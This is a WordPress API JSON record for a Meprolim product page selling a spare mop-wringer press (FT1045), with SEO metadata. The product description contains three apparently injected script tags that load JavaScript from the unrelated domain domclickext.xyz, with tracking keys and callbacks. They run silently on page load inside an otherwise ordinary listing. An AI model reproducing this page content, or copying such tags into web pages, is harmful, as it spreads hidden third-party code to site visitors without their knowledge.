{"id":10855,"date":"2019-10-21T10:18:29","date_gmt":"2019-10-21T09:18:29","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=10855"},"modified":"2019-10-30T12:30:21","modified_gmt":"2019-10-30T12:30:21","slug":"repuesto-prensa-codigo-ft1045","status":"publish","type":"product","link":"https:\/\/meprolim.es\/en\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual-en\/sistemas-fregado-en\/ultra-speed-vileda-en\/repuesto-prensa-codigo-ft1045\/","title":{"rendered":"REPUESTO PRENSA &#8211; C\u00d3DIGO: FT1045"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Repuesto para prensa de fregado.<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_747509024&amp;key=212b3d4039ab5319ec&amp;cv=1571649557&amp;t=1571649556914\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_229924269&amp;key=212b3d4039ab5319ec&amp;cv=315202&amp;t=1571649556915\" type=\"text\/javascript\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<ul>\n<li>Proceso de escurrido es simple y r\u00e1pido.<\/li>\n<li>Prensa hasta un 50 % m\u00e1s eficiente.<\/li>\n<\/ul>\n<p><strong>SKU: FT1045<\/strong><\/p>\n","protected":false},"featured_media":10856,"template":"","meta":[],"product_brand":[],"product_cat":[102,324,1085,946],"product_tag":[325,371],"class_list":{"0":"post-10855","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","7":"product_cat-fregado-manual","8":"product_cat-sistemas-fregado","9":"product_cat-ultra-speed-vileda","10":"product_tag-fregado-manual","11":"product_tag-prensa","13":"first","14":"instock","15":"shipping-taxable","16":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"Proceso de escurrido es simple y r\u00e1pido.  Prensa hasta un 50 % m\u00e1s eficiente.  SKU: FT1045\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T12:30:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/FT1045.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/\",\"name\":\"REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/FT1045.jpg\",\"datePublished\":\"2019-10-21T09:18:29+00:00\",\"dateModified\":\"2019-10-30T12:30:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/FT1045.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/FT1045.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/ultra-speed-vileda\\\/repuesto-prensa-codigo-ft1045\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"REPUESTO PRENSA &#8211; C\u00d3DIGO: FT1045\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/","og_locale":"en_US","og_type":"article","og_title":"REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim","og_description":"Proceso de escurrido es simple y r\u00e1pido.  Prensa hasta un 50 % m\u00e1s eficiente.  SKU: FT1045","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T12:30:21+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/FT1045.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/","name":"REPUESTO PRENSA - C\u00d3DIGO: FT1045 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/FT1045.jpg","datePublished":"2019-10-21T09:18:29+00:00","dateModified":"2019-10-30T12:30:21+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/FT1045.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/FT1045.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/ultra-speed-vileda\/repuesto-prensa-codigo-ft1045\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/en\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/en\/catalogue\/"},{"@type":"ListItem","position":3,"name":"REPUESTO PRENSA &#8211; C\u00d3DIGO: FT1045"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product\/10855","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media\/10856"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media?parent=10855"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_brand?post=10855"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_cat?post=10855"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_tag?post=10855"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}